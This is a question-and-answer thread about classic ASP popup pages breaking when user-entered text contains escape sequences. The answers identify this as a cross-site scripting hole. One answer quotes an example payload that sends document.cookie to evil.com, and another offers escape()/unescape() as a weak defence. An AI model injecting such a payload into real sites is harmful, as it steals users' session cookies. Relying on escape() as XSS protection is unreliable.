# Escape Sequence problem-can not open a page

Tags: javascript, asp-classic

I have the following problem. I have a form where the user can enter some data. 
There are all kinds of users, so it happened  the user enters the escape sequence (eg, text \ n text). 
This entry is inserting into the database. However, the user can click a button to open a pop up window in which
 it is displayed submit a comment.
 All windows operate smoothly, except those that contain escape sequences, they can not  to be opened. 
This is a classic asp with java script. Has anyone had a similar problem? Maybe charset is problem?

Answer (score 0):

You've discovered the more benign problems of XSS holes.

You need to Javascript-escape the strings.

You need to do this **now**, before someone enters `");document.location = "http://evil.com/?cookie=" + document.cookie;//`

Answer (score 0):

To go along with SLaks:

At the *very least*, use `escape(stringVariable)` and `unescape(stringVariable)` to encode (and later decode) most special characters to help prevent XSS (stands for Cross Site Scripting). SLaks's example shows someone injecting malicious code to redirect a user to another site while copying any existing cookie information.